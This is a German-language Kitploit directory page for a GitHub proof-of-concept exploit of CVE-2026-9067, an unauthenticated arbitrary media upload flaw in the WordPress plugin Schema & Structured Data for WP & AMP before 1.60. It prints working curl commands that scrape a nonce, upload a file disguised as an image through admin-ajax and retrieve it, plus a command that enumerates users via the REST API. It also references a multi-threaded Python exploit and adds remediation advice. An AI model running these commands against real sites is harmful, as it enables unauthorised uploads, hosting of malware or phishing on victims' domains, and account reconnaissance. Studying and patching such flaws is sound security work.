Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
By-Poloss..-..CVE-2026-9067 — Schema & Structured Data for WP & AMP < 1.60 - Unauthenticated Arbitrary Media Upload [POC & Xploit] | Kitploit
Tools/GitHubGitHub/polosss/by-poloss..-..cve-2026-9067
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubpolosss/by-poloss..-..cve-2026-9067

By-Poloss..-..CVE-2026-9067

Schema & Structured Data for WP & AMP < 1.60 - Unauthenticated Arbitrary Media Upload [POC & Xploit]

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
3vor 2 MonatenNoch nicht geprüft

POC & Xploit - Proof-of-Concept-Verzeichnis

Dokumentation und Exploit für Schwachstellen, die in der WordPress-Sicherheitstestumgebung gefunden wurden.


Liste der Schwachstellen

CVE IDPluginSchweregradTypStatus
CVE-2026-9067Schema & Structured Data for WP & AMPHoch (8.1)Unrestricted File UploadDokumentiert

CVE-2026-9067

Kurzzusammenfassung

Beschreibung der Schwachstelle

Das Plugin Schema & Structured Data for WP & AMP vor Version 1.60 validiert weder die Benutzerfähigkeiten in den AJAX-Handlern für Datei-Uploads noch den hochgeladenen Dateityp. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien hochzuladen.

Auswirkungen

  • Content Hosting: Angreifer können bösartige Inhalte auf der Domain des Opfers hosten.
  • Disk Consumption: Beliebige Datei-Uploads können Speicherplatz verbrauchen.
  • Reputation Abuse: Verteilung von Malware, Phishing-Seiten von der Domain des Opfers.

Wichtiger Hinweis: WordPress Core blockiert ausführbare Dateien (.php, .phtml, .html, .svg), sodass kein direkter RCE-Pfad von dieser Schwachstelle ausgeht.

Dateien

root@kitploit:~
CVE-2026-9067/
├── CVE-2026-9067.md       # Dokumentation vollständig (diese Datei)
├── CVE-2026-9067.py       # Python-Exploit mit Multi-Threading
├── CVE-2026-9067.sh       # Bash/Shell PoC-Skript
└── CVE-2026-9067_exploit.sh  # Alternatives Bash-PoC

Kurzer PoC

root@kitploit:~
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/HEAD/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F '[email protected];type=image/png;filename=evil.csv'

# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"

Umgebungsinformationen


Testbefehle

Website-Status prüfen

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site

Plugin-Version prüfen

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"

Benutzer auflisten

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'

Abhilfe

  1. Plugin aktualisieren: Aktualisieren Sie Schema & Structured Data for WP & AMP auf Version 1.60 oder neuer.
  2. Plugin deaktivieren: Wenn ein Update nicht möglich ist, deaktivieren Sie das Plugin.
  3. Härtung:
    • Setzen Sie die Konstante DISALLOW_FILE_MODIFICATIONS.
    • Deaktivieren Sie die PHP-Ausführung im Uploads-Verzeichnis via .htaccess.
    • Implementieren Sie WAF-Regeln.

Referenzen

  • NVD CVE-2026-9067
  • WPScan Vulnerability Database
  • WordPress Plugin Page
  • Original Researcher: 0xBassia
Tool herunterladen
FeldWert
CVE IDCVE-2026-9067
PluginSchema & Structured Data for WP & AMP
Betroffene Versionen< 1.60
CWECWE-434 (Uneingeschränkter Upload von Dateien mit gefährlichem Typ)
CVSS v3.18.1 (Hoch)
Entdecker0xBassia
FeldWert
Ziel-URLhttps://yorbit7.ddev.site
PHP-Version8.4
DatenbankMariaDB 11.8
WordPress-Version7.0
Testmethodecurl-basiert (Black-Box-Test)